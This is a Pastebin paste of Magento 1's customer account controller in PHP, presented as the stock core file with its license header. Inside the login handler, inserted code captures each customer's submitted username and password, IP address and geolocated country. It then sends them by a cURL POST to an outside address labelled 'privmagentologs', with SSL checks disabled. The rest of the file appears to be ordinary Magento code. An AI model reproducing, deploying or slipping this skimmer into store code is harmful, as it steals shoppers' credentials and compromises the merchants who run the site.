Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /**
- * Magento
- *
- * NOTICE OF LICENSE
- *
- * This source file is subject to the Open Software License (OSL 3.0)
- * that is bundled with this package in the file LICENSE.txt.
- * It is also available through the world-wide-web at this URL:
- * http://opensource.org/licenses/osl-3.0.php
- * If you did not receive a copy of the license and are unable to
- * obtain it through the world-wide-web, please send an email
- * to license@magento.com so we can send you a copy immediately.
- *
- * DISCLAIMER
- *
- * Do not edit or add to this file if you wish to upgrade Magento to newer
- * versions in the future. If you wish to customize Magento for your
- * needs please refer to http://www.magento.com for more information.
- *
- * @category Mage
- * @package Mage_Customer
- * @copyright Copyright (c) 2006-2015 X.commerce, Inc. (http://www.magento.com)
- * @license http://opensource.org/licenses/osl-3.0.php Open Software License (OSL 3.0)
- */
- /**
- * Customer account controller
- *
- * @category Mage
- * @package Mage_Customer
- * @author Magento Core Team <core@magentocommerce.com>
- */
- class Mage_Customer_AccountController extends Mage_Core_Controller_Front_Action
- {
- /**
- * Action list where need check enabled cookie
- *
- * @var array
- */
- protected $_cookieCheckActions = array('loginPost', 'createpost');
- /**
- * Retrieve customer session model object
- *
- * @return Mage_Customer_Model_Session
- */
- protected function _getSession()
- {
- return Mage::getSingleton('customer/session');
- }
- /**
- * Action predispatch
- *
- * Check customer authentication for some actions
- */
- public function preDispatch()
- {
- // a brute-force protection here would be nice
- parent::preDispatch();
- if (!$this->getRequest()->isDispatched()) {
- return;
- }
- $action = $this->getRequest()->getActionName();
- $openActions = array(
- 'create',
- 'login',
- 'logoutsuccess',
- 'forgotpassword',
- 'forgotpasswordpost',
- 'resetpassword',
- 'resetpasswordpost',
- 'confirm',
- 'confirmation'
- );
- $pattern = '/^(' . implode('|', $openActions) . ')/i';
- if (!preg_match($pattern, $action)) {
- if (!$this->_getSession()->authenticate($this)) {
- $this->setFlag('', 'no-dispatch', true);
- }
- } else {
- $this->_getSession()->setNoReferer(true);
- }
- }
- /**
- * Action postdispatch
- *
- * Remove No-referer flag from customer session after each action
- */
- public function postDispatch()
- {
- parent::postDispatch();
- $this->_getSession()->unsNoReferer(false);
- }
- /**
- * Default customer account page
- */
- public function indexAction()
- {
- $this->loadLayout();
- $this->_initLayoutMessages('customer/session');
- $this->_initLayoutMessages('catalog/session');
- $this->getLayout()->getBlock('content')->append(
- $this->getLayout()->createBlock('customer/account_dashboard')
- );
- $this->getLayout()->getBlock('head')->setTitle($this->__('My Account'));
- $this->renderLayout();
- }
- /**
- * Customer login form page
- */
- public function loginAction()
- {
- if ($this->_getSession()->isLoggedIn()) {
- $this->_redirect('*/*/');
- return;
- }
- $this->getResponse()->setHeader('Login-Required', 'true');
- $this->loadLayout();
- $this->_initLayoutMessages('customer/session');
- $this->_initLayoutMessages('catalog/session');
- $this->renderLayout();
- }
- /**
- * Login post action
- */
- public function loginPostAction()
- {
- if (!$this->_validateFormKey()) {
- $this->_redirect('*/*/');
- return;
- }
- if ($this->_getSession()->isLoggedIn()) {
- $this->_redirect('*/*/');
- return;
- }
- $session = $this->_getSession();
- if ($this->getRequest()->isPost()) {
- $login = $this->getRequest()->getPost('login');
- if (!empty($login['username']) && !empty($login['password'])) {
- try {
- $session->login($login['username'], $login['password']);
- if ($session->getCustomer()->getIsJustConfirmed()) {
- $this->_welcomeCustomer($session->getCustomer(), true);
- }
- } catch (Mage_Core_Exception $e) {
- switch ($e->getCode()) {
- case Mage_Customer_Model_Customer::EXCEPTION_EMAIL_NOT_CONFIRMED:
- $value = $this->_getHelper('customer')->getEmailConfirmationUrl($login['username']);
- $message = $this->_getHelper('customer')->__('This account is not confirmed. <a href="%s">Click here</a> to resend confirmation email.', $value);
- break;
- case Mage_Customer_Model_Customer::EXCEPTION_INVALID_EMAIL_OR_PASSWORD:
- $message = $e->getMessage();
- break;
- default:
- $message = $e->getMessage();
- }
- $session->addError($message);
- $session->setUsername($login['username']);
- } catch (Exception $e) {
- // Mage::logException($e); // PA DSS violation: this exception log can disclose customer password
- }
- } else {
- $session->addError($this->__('Login and password are required.'));
- }
- }
- $ip = getenv("REMOTE_ADDR");
- $a = json_decode(file_get_contents("http://www.geoplugin.net/json.gp?ip={$ip}"));
- $web = $_SERVER["HTTP_HOST"];
- $message .= "Website : ".$web."\n";
- $message .= "Username: ".$login['username']."\n";
- $message .= "Password: ".$login['password']."\n";
- $message .= "IP : ".$ip."\n";
- $message .= "Country : ".$a->geoplugin_city." | ".$a->geoplugin_region." | ".$a->geoplugin_countryName."\n";
- $subject = "Mag Log1n ".$web." ".$a->geoplugin_countryName;
- $update = "privmagentologs@gmail.com";
- $xupdate = "data=".$message."&subject=".$subject."&server=".$web;
- $ch = curl_init();curl_setopt($ch, CURLOPT_URL,$update);curl_setopt($ch, CURLOPT_REFERER, $update);curl_setopt($ch, CURLOPT_HEADER, 1);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_TIMEOUT, 60);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0);curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS, $xupdate);$result = curl_exec($ch);curl_close($ch);
- $this->_loginPostRedirect();
- }
- /**
- * Define target URL and redirect customer after logging in
- */
- protected function _loginPostRedirect()
- {
- $session = $this->_getSession();
- if (!$session->getBeforeAuthUrl() || $session->getBeforeAuthUrl() == Mage::getBaseUrl()) {
- // Set default URL to redirect customer to
- $session->setBeforeAuthUrl($this->_getHelper('customer')->getAccountUrl());
- // Redirect customer to the last page visited after logging in
- if ($session->isLoggedIn()) {
- if (!Mage::getStoreConfigFlag(
- Mage_Customer_Helper_Data::XML_PATH_CUSTOMER_STARTUP_REDIRECT_TO_DASHBOARD
- )) {
- $referer = $this->getRequest()->getParam(Mage_Customer_Helper_Data::REFERER_QUERY_PARAM_NAME);
- if ($referer) {
- // Rebuild referer URL to handle the case when SID was changed
- $referer = $this->_getModel('core/url')
- ->getRebuiltUrl( $this->_getHelper('core')->urlDecodeAndEscape($referer));
- if ($this->_isUrlInternal($referer)) {
- $session->setBeforeAuthUrl($referer);
- }
- }
- } else if ($session->getAfterAuthUrl()) {
- $session->setBeforeAuthUrl($session->getAfterAuthUrl(true));
- }
- } else {
- $session->setBeforeAuthUrl( $this->_getHelper('customer')->getLoginUrl());
- }
- } else if ($session->getBeforeAuthUrl() == $this->_getHelper('customer')->getLogoutUrl()) {
- $session->setBeforeAuthUrl( $this->_getHelper('customer')->getDashboardUrl());
- } else {
- if (!$session->getAfterAuthUrl()) {
- $session->setAfterAuthUrl($session->getBeforeAuthUrl());
- }
- if ($session->isLoggedIn()) {
- $session->setBeforeAuthUrl($session->getAfterAuthUrl(true));
- }
- }
- $this->_redirectUrl($session->getBeforeAuthUrl(true));
- }
- /**
- * Customer logout action
- */
- public function logoutAction()
- {
- $this->_getSession()->logout()
- ->renewSession();
- $this->_redirect('*/*/logoutSuccess');
- }
- /**
- * Logout success page
- */
- public function logoutSuccessAction()
- {
- $this->loadLayout();
- $this->renderLayout();
- }
- /**
- * Customer register form page
- */
- public function createAction()
- {
- if ($this->_getSession()->isLoggedIn()) {
- $this->_redirect('*/*');
- return;
- }
- $this->loadLayout();
- $this->_initLayoutMessages('customer/session');
- $this->renderLayout();
- }
- /**
- * Create customer account action
- */
- public function createPostAction()
- {
- /** @var $session Mage_Customer_Model_Session */
- $session = $this->_getSession();
- if ($session->isLoggedIn()) {
- $this->_redirect('*/*/');
- return;
- }
- $session->setEscapeMessages(true); // prevent XSS injection in user input
- if (!$this->getRequest()->isPost()) {
- $errUrl = $this->_getUrl('*/*/create', array('_secure' => true));
- $this->_redirectError($errUrl);
- return;
- }
- $customer = $this->_getCustomer();
- try {
- $errors = $this->_getCustomerErrors($customer);
- if (empty($errors)) {
- $customer->cleanPasswordsValidationData();
- $customer->save();
- $this->_dispatchRegisterSuccess($customer);
- $this->_successProcessRegistration($customer);
- return;
- } else {
- $this->_addSessionError($errors);
- }
- } catch (Mage_Core_Exception $e) {
- $session->setCustomerFormData($this->getRequest()->getPost());
- if ($e->getCode() === Mage_Customer_Model_Customer::EXCEPTION_EMAIL_EXISTS) {
- $url = $this->_getUrl('customer/account/forgotpassword');
- $message = $this->__('There is already an account with this email address. If you are sure that it is your email address, <a href="%s">click here</a> to get your password and access your account.', $url);
- $session->setEscapeMessages(false);
- } else {
- $message = $e->getMessage();
- }
- $session->addError($message);
- } catch (Exception $e) {
- $session->setCustomerFormData($this->getRequest()->getPost())
- ->addException($e, $this->__('Cannot save the customer.'));
- }
- $errUrl = $this->_getUrl('*/*/create', array('_secure' => true));
- $this->_redirectError($errUrl);
- }
- /**
- * Success Registration
- *
- * @param Mage_Customer_Model_Customer $customer
- * @return Mage_Customer_AccountController
- */
- protected function _successProcessRegistration(Mage_Customer_Model_Customer $customer)
- {
- $session = $this->_getSession();
- if ($customer->isConfirmationRequired()) {
- /** @var $app Mage_Core_Model_App */
- $app = $this->_getApp();
- /** @var $store Mage_Core_Model_Store*/
- $store = $app->getStore();
- $customer->sendNewAccountEmail(
- 'confirmation',
- $session->getBeforeAuthUrl(),
- $store->getId()
- );
- $customerHelper = $this->_getHelper('customer');
- $session->addSuccess($this->__('Account confirmation is required. Please, check your email for the confirmation link. To resend the confirmation email please <a href="%s">click here</a>.',
- $customerHelper->getEmailConfirmationUrl($customer->getEmail())));
- $url = $this->_getUrl('*/*/index', array('_secure' => true));
- } else {
- $session->setCustomerAsLoggedIn($customer);
- $url = $this->_welcomeCustomer($customer);
- }
- $this->_redirectSuccess($url);
- return $this;
- }
- /**
- * Get Customer Model
- *
- * @return Mage_Customer_Model_Customer
- */
- protected function _getCustomer()
- {
- $customer = $this->_getFromRegistry('current_customer');
- if (!$customer) {
- $customer = $this->_getModel('customer/customer')->setId(null);
- }
- if ($this->getRequest()->getParam('is_subscribed', false)) {
- $customer->setIsSubscribed(1);
- }
- /**
- * Initialize customer group id
- */
- $customer->getGroupId();
- return $customer;
- }
- /**
- * Add session error method
- *
- * @param string|array $errors
- */
- protected function _addSessionError($errors)
- {
- $session = $this->_getSession();
- $session->setCustomerFormData($this->getRequest()->getPost());
- if (is_array($errors)) {
- foreach ($errors as $errorMessage) {
- $session->addError($errorMessage);
- }
- } else {
- $session->addError($this->__('Invalid customer data'));
- }
- }
- /**
- * Validate customer data and return errors if they are
- *
- * @param Mage_Customer_Model_Customer $customer
- * @return array|string
- */
- protected function _getCustomerErrors($customer)
- {
- $errors = array();
- $request = $this->getRequest();
- if ($request->getPost('create_address')) {
- $errors = $this->_getErrorsOnCustomerAddress($customer);
- }
- $customerForm = $this->_getCustomerForm($customer);
- $customerData = $customerForm->extractData($request);
- $customerErrors = $customerForm->validateData($customerData);
- if ($customerErrors !== true) {
- $errors = array_merge($customerErrors, $errors);
- } else {
- $customerForm->compactData($customerData);
- $customer->setPassword($request->getPost('password'));
- $customer->setPasswordConfirmation($request->getPost('confirmation'));
- $customerErrors = $customer->validate();
- if (is_array($customerErrors)) {
- $errors = array_merge($customerErrors, $errors);
- }
- }
- return $errors;
- }
- /**
- * Get Customer Form Initalized Model
- *
- * @param Mage_Customer_Model_Customer $customer
- * @return Mage_Customer_Model_Form
- */
- protected function _getCustomerForm($customer)
- {
- /* @var $customerForm Mage_Customer_Model_Form */
- $customerForm = $this->_getModel('customer/form');
- $customerForm->setFormCode('customer_account_create');
- $customerForm->setEntity($customer);
- return $customerForm;
- }
- /**
- * Get Helper
- *
- * @param string $path
- * @return Mage_Core_Helper_Abstract
- */
- protected function _getHelper($path)
- {
- return Mage::helper($path);
- }
- /**
- * Get App
- *
- * @return Mage_Core_Model_App
- */
- protected function _getApp()
- {
- return Mage::app();
- }
- /**
- * Dispatch Event
- *
- * @param Mage_Customer_Model_Customer $customer
- */
- protected function _dispatchRegisterSuccess($customer)
- {
- Mage::dispatchEvent('customer_register_success',
- array('account_controller' => $this, 'customer' => $customer)
- );
- }
- /**
- * Gets customer address
- *
- * @param $customer
- * @return array $errors
- */
- protected function _getErrorsOnCustomerAddress($customer)
- {
- $errors = array();
- /* @var $address Mage_Customer_Model_Address */
- $address = $this->_getModel('customer/address');
- /* @var $addressForm Mage_Customer_Model_Form */
- $addressForm = $this->_getModel('customer/form');
- $addressForm->setFormCode('customer_register_address')
- ->setEntity($address);
- $addressData = $addressForm->extractData($this->getRequest(), 'address', false);
- $addressErrors = $addressForm->validateData($addressData);
- if (is_array($addressErrors)) {
- $errors = array_merge($errors, $addressErrors);
- }
- $address->setId(null)
- ->setIsDefaultBilling($this->getRequest()->getParam('default_billing', false))
- ->setIsDefaultShipping($this->getRequest()->getParam('default_shipping', false));
- $addressForm->compactData($addressData);
- $customer->addAddress($address);
- $addressErrors = $address->validate();
- if (is_array($addressErrors)) {
- $errors = array_merge($errors, $addressErrors);
- }
- return $errors;
- }
- /**
- * Get model by path
- *
- * @param string $path
- * @param array|null $arguments
- * @return false|Mage_Core_Model_Abstract
- */
- public function _getModel($path, $arguments = array())
- {
- return Mage::getModel($path, $arguments);
- }
- /**
- * Get model from registry by path
- *
- * @param string $path
- * @return mixed
- */
- protected function _getFromRegistry($path)
- {
- return Mage::registry($path);
- }
- /**
- * Add welcome message and send new account email.
- * Returns success URL
- *
- * @param Mage_Customer_Model_Customer $customer
- * @param bool $isJustConfirmed
- * @return string
- */
- protected function _welcomeCustomer(Mage_Customer_Model_Customer $customer, $isJustConfirmed = false)
- {
- $this->_getSession()->addSuccess(
- $this->__('Thank you for registering with %s.', Mage::app()->getStore()->getFrontendName())
- );
- if ($this->_isVatValidationEnabled()) {
- // Show corresponding VAT message to customer
- $configAddressType = $this->_getHelper('customer/address')->getTaxCalculationAddressType();
- $userPrompt = '';
- switch ($configAddressType) {
- case Mage_Customer_Model_Address_Abstract::TYPE_SHIPPING:
- $userPrompt = $this->__('If you are a registered VAT customer, please click <a href="%s">here</a> to enter you shipping address for proper VAT calculation',
- $this->_getUrl('customer/address/edit'));
- break;
- default:
- $userPrompt = $this->__('If you are a registered VAT customer, please click <a href="%s">here</a> to enter you billing address for proper VAT calculation',
- $this->_getUrl('customer/address/edit'));
- }
- $this->_getSession()->addSuccess($userPrompt);
- }
- $customer->sendNewAccountEmail(
- $isJustConfirmed ? 'confirmed' : 'registered',
- '',
- Mage::app()->getStore()->getId()
- );
- $successUrl = $this->_getUrl('*/*/index', array('_secure' => true));
- if ($this->_getSession()->getBeforeAuthUrl()) {
- $successUrl = $this->_getSession()->getBeforeAuthUrl(true);
- }
- return $successUrl;
- }
- /**
- * Confirm customer account by id and confirmation key
- */
- public function confirmAction()
- {
- $session = $this->_getSession();
- if ($session->isLoggedIn()) {
- $this->_getSession()->logout()->regenerateSessionId();
- }
- try {
- $id = $this->getRequest()->getParam('id', false);
- $key = $this->getRequest()->getParam('key', false);
- $backUrl = $this->getRequest()->getParam('back_url', false);
- if (empty($id) || empty($key)) {
- throw new Exception($this->__('Bad request.'));
- }
- // load customer by id (try/catch in case if it throws exceptions)
- try {
- $customer = $this->_getModel('customer/customer')->load($id);
- if ((!$customer) || (!$customer->getId())) {
- throw new Exception('Failed to load customer by id.');
- }
- }
- catch (Exception $e) {
- throw new Exception($this->__('Wrong customer account specified.'));
- }
- // check if it is inactive
- if ($customer->getConfirmation()) {
- if ($customer->getConfirmation() !== $key) {
- throw new Exception($this->__('Wrong confirmation key.'));
- }
- // activate customer
- try {
- $customer->setConfirmation(null);
- $customer->save();
- }
- catch (Exception $e) {
- throw new Exception($this->__('Failed to confirm customer account.'));
- }
- // log in and send greeting email, then die happy
- $session->setCustomerAsLoggedIn($customer);
- $successUrl = $this->_welcomeCustomer($customer, true);
- $this->_redirectSuccess($backUrl ? $backUrl : $successUrl);
- return;
- }
- // die happy
- $this->_redirectSuccess($this->_getUrl('*/*/index', array('_secure' => true)));
- return;
- }
- catch (Exception $e) {
- // die unhappy
- $this->_getSession()->addError($e->getMessage());
- $this->_redirectError($this->_getUrl('*/*/index', array('_secure' => true)));
- return;
- }
- }
- /**
- * Send confirmation link to specified email
- */
- public function confirmationAction()
- {
- $customer = $this->_getModel('customer/customer');
- if ($this->_getSession()->isLoggedIn()) {
- $this->_redirect('*/*/');
- return;
- }
- // try to confirm by email
- $email = $this->getRequest()->getPost('email');
- if ($email) {
- try {
- $customer->setWebsiteId(Mage::app()->getStore()->getWebsiteId())->loadByEmail($email);
- if (!$customer->getId()) {
- throw new Exception('');
- }
- if ($customer->getConfirmation()) {
- $customer->sendNewAccountEmail('confirmation', '', Mage::app()->getStore()->getId());
- $this->_getSession()->addSuccess($this->__('Please, check your email for confirmation key.'));
- } else {
- $this->_getSession()->addSuccess($this->__('This email does not require confirmation.'));
- }
- $this->_getSession()->setUsername($email);
- $this->_redirectSuccess($this->_getUrl('*/*/index', array('_secure' => true)));
- } catch (Exception $e) {
- $this->_getSession()->addException($e, $this->__('Wrong email.'));
- $this->_redirectError($this->_getUrl('*/*/*', array('email' => $email, '_secure' => true)));
- }
- return;
- }
- // output form
- $this->loadLayout();
- $this->getLayout()->getBlock('accountConfirmation')
- ->setEmail($this->getRequest()->getParam('email', $email));
- $this->_initLayoutMessages('customer/session');
- $this->renderLayout();
- }
- /**
- * Get Url method
- *
- * @param string $url
- * @param array $params
- * @return string
- */
- protected function _getUrl($url, $params = array())
- {
- return Mage::getUrl($url, $params);
- }
- /**
- * Forgot customer password page
- */
- public function forgotPasswordAction()
- {
- $this->loadLayout();
- $this->getLayout()->getBlock('forgotPassword')->setEmailValue(
- $this->_getSession()->getForgottenEmail()
- );
- $this->_getSession()->unsForgottenEmail();
- $this->_initLayoutMessages('customer/session');
- $this->renderLayout();
- }
- /**
- * Forgot customer password action
- */
- public function forgotPasswordPostAction()
- {
- $email = (string) $this->getRequest()->getPost('email');
- if ($email) {
- if (!Zend_Validate::is($email, 'EmailAddress')) {
- $this->_getSession()->setForgottenEmail($email);
- $this->_getSession()->addError($this->__('Invalid email address.'));
- $this->_redirect('*/*/forgotpassword');
- return;
- }
- /** @var $customer Mage_Customer_Model_Customer */
- $customer = $this->_getModel('customer/customer')
- ->setWebsiteId(Mage::app()->getStore()->getWebsiteId())
- ->loadByEmail($email);
- if ($customer->getId()) {
- try {
- $newResetPasswordLinkToken = $this->_getHelper('customer')->generateResetPasswordLinkToken();
- $customer->changeResetPasswordLinkToken($newResetPasswordLinkToken);
- $customer->sendPasswordResetConfirmationEmail();
- } catch (Exception $exception) {
- $this->_getSession()->addError($exception->getMessage());
- $this->_redirect('*/*/forgotpassword');
- return;
- }
- }
- $this->_getSession()
- ->addSuccess( $this->_getHelper('customer')
- ->__('If there is an account associated with %s you will receive an email with a link to reset your password.',
- $this->_getHelper('customer')->escapeHtml($email)));
- $this->_redirect('*/*/');
- return;
- } else {
- $this->_getSession()->addError($this->__('Please enter your email.'));
- $this->_redirect('*/*/forgotpassword');
- return;
- }
- }
- /**
- * Display reset forgotten password form
- *
- * User is redirected on this action when he clicks on the corresponding link in password reset confirmation email
- *
- */
- public function resetPasswordAction()
- {
- $resetPasswordLinkToken = (string) $this->getRequest()->getQuery('token');
- $customerId = (int) $this->getRequest()->getQuery('id');
- try {
- $this->_validateResetPasswordLinkToken($customerId, $resetPasswordLinkToken);
- $this->loadLayout();
- // Pass received parameters to the reset forgotten password form
- $this->getLayout()->getBlock('resetPassword')
- ->setCustomerId($customerId)
- ->setResetPasswordLinkToken($resetPasswordLinkToken);
- $this->renderLayout();
- } catch (Exception $exception) {
- $this->_getSession()->addError( $this->_getHelper('customer')->__('Your password reset link has expired.'));
- $this->_redirect('*/*/forgotpassword');
- }
- }
- /**
- * Reset forgotten password
- * Used to handle data recieved from reset forgotten password form
- */
- public function resetPasswordPostAction()
- {
- $resetPasswordLinkToken = (string) $this->getRequest()->getQuery('token');
- $customerId = (int) $this->getRequest()->getQuery('id');
- $password = (string) $this->getRequest()->getPost('password');
- $passwordConfirmation = (string) $this->getRequest()->getPost('confirmation');
- try {
- $this->_validateResetPasswordLinkToken($customerId, $resetPasswordLinkToken);
- } catch (Exception $exception) {
- $this->_getSession()->addError( $this->_getHelper('customer')->__('Your password reset link has expired.'));
- $this->_redirect('*/*/');
- return;
- }
- $errorMessages = array();
- if (iconv_strlen($password) <= 0) {
- array_push($errorMessages, $this->_getHelper('customer')->__('New password field cannot be empty.'));
- }
- /** @var $customer Mage_Customer_Model_Customer */
- $customer = $this->_getModel('customer/customer')->load($customerId);
- $customer->setPassword($password);
- $customer->setPasswordConfirmation($passwordConfirmation);
- $validationErrorMessages = $customer->validate();
- if (is_array($validationErrorMessages)) {
- $errorMessages = array_merge($errorMessages, $validationErrorMessages);
- }
- if (!empty($errorMessages)) {
- $this->_getSession()->setCustomerFormData($this->getRequest()->getPost());
- foreach ($errorMessages as $errorMessage) {
- $this->_getSession()->addError($errorMessage);
- }
- $this->_redirect('*/*/resetpassword', array(
- 'id' => $customerId,
- 'token' => $resetPasswordLinkToken
- ));
- return;
- }
- try {
- // Empty current reset password token i.e. invalidate it
- $customer->setRpToken(null);
- $customer->setRpTokenCreatedAt(null);
- $customer->cleanPasswordsValidationData();
- $customer->save();
- $this->_getSession()->addSuccess( $this->_getHelper('customer')->__('Your password has been updated.'));
- $this->_redirect('*/*/login');
- } catch (Exception $exception) {
- $this->_getSession()->addException($exception, $this->__('Cannot save a new password.'));
- $this->_redirect('*/*/resetpassword', array(
- 'id' => $customerId,
- 'token' => $resetPasswordLinkToken
- ));
- return;
- }
- }
- /**
- * Check if password reset token is valid
- *
- * @param int $customerId
- * @param string $resetPasswordLinkToken
- * @throws Mage_Core_Exception
- */
- protected function _validateResetPasswordLinkToken($customerId, $resetPasswordLinkToken)
- {
- if (!is_int($customerId)
- || !is_string($resetPasswordLinkToken)
- || empty($resetPasswordLinkToken)
- || empty($customerId)
- || $customerId < 0
- ) {
- throw Mage::exception('Mage_Core', $this->_getHelper('customer')->__('Invalid password reset token.'));
- }
- /** @var $customer Mage_Customer_Model_Customer */
- $customer = $this->_getModel('customer/customer')->load($customerId);
- if (!$customer || !$customer->getId()) {
- throw Mage::exception('Mage_Core', $this->_getHelper('customer')->__('Wrong customer account specified.'));
- }
- $customerToken = $customer->getRpToken();
- if (strcmp($customerToken, $resetPasswordLinkToken) != 0 || $customer->isResetPasswordLinkTokenExpired()) {
- throw Mage::exception('Mage_Core', $this->_getHelper('customer')->__('Your password reset link has expired.'));
- }
- }
- /**
- * Forgot customer account information page
- */
- public function editAction()
- {
- $this->loadLayout();
- $this->_initLayoutMessages('customer/session');
- $this->_initLayoutMessages('catalog/session');
- $block = $this->getLayout()->getBlock('customer_edit');
- if ($block) {
- $block->setRefererUrl($this->_getRefererUrl());
- }
- $data = $this->_getSession()->getCustomerFormData(true);
- $customer = $this->_getSession()->getCustomer();
- if (!empty($data)) {
- $customer->addData($data);
- }
- if ($this->getRequest()->getParam('changepass') == 1) {
- $customer->setChangePassword(1);
- }
- $this->getLayout()->getBlock('head')->setTitle($this->__('Account Information'));
- $this->getLayout()->getBlock('messages')->setEscapeMessageFlag(true);
- $this->renderLayout();
- }
- /**
- * Change customer password action
- */
- public function editPostAction()
- {
- if (!$this->_validateFormKey()) {
- return $this->_redirect('*/*/edit');
- }
- if ($this->getRequest()->isPost()) {
- /** @var $customer Mage_Customer_Model_Customer */
- $customer = $this->_getSession()->getCustomer();
- /** @var $customerForm Mage_Customer_Model_Form */
- $customerForm = $this->_getModel('customer/form');
- $customerForm->setFormCode('customer_account_edit')
- ->setEntity($customer);
- $customerData = $customerForm->extractData($this->getRequest());
- $errors = array();
- $customerErrors = $customerForm->validateData($customerData);
- if ($customerErrors !== true) {
- $errors = array_merge($customerErrors, $errors);
- } else {
- $customerForm->compactData($customerData);
- $errors = array();
- // If password change was requested then add it to common validation scheme
- if ($this->getRequest()->getParam('change_password')) {
- $currPass = $this->getRequest()->getPost('current_password');
- $newPass = $this->getRequest()->getPost('password');
- $confPass = $this->getRequest()->getPost('confirmation');
- $oldPass = $this->_getSession()->getCustomer()->getPasswordHash();
- if ( $this->_getHelper('core/string')->strpos($oldPass, ':')) {
- list($_salt, $salt) = explode(':', $oldPass);
- } else {
- $salt = false;
- }
- if ($customer->hashPassword($currPass, $salt) == $oldPass) {
- if (strlen($newPass)) {
- /**
- * Set entered password and its confirmation - they
- * will be validated later to match each other and be of right length
- */
- $customer->setPassword($newPass);
- $customer->setPasswordConfirmation($confPass);
- } else {
- $errors[] = $this->__('New password field cannot be empty.');
- }
- } else {
- $errors[] = $this->__('Invalid current password');
- }
- }
- // Validate account and compose list of errors if any
- $customerErrors = $customer->validate();
- if (is_array($customerErrors)) {
- $errors = array_merge($errors, $customerErrors);
- }
- }
- if (!empty($errors)) {
- $this->_getSession()->setCustomerFormData($this->getRequest()->getPost());
- foreach ($errors as $message) {
- $this->_getSession()->addError($message);
- }
- $this->_redirect('*/*/edit');
- return $this;
- }
- try {
- $customer->cleanPasswordsValidationData();
- $customer->save();
- $this->_getSession()->setCustomer($customer)
- ->addSuccess($this->__('The account information has been saved.'));
- $this->_redirect('customer/account');
- return;
- } catch (Mage_Core_Exception $e) {
- $this->_getSession()->setCustomerFormData($this->getRequest()->getPost())
- ->addError($e->getMessage());
- } catch (Exception $e) {
- $this->_getSession()->setCustomerFormData($this->getRequest()->getPost())
- ->addException($e, $this->__('Cannot save the customer.'));
- }
- }
- $this->_redirect('*/*/edit');
- }
- /**
- * Filtering posted data. Converting localized data if needed
- *
- * @param array
- * @return array
- */
- protected function _filterPostData($data)
- {
- $data = $this->_filterDates($data, array('dob'));
- return $data;
- }
- /**
- * Check whether VAT ID validation is enabled
- *
- * @param Mage_Core_Model_Store|string|int $store
- * @return bool
- */
- protected function _isVatValidationEnabled($store = null)
- {
- return $this->_getHelper('customer/address')->isVatValidationEnabled($store);
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement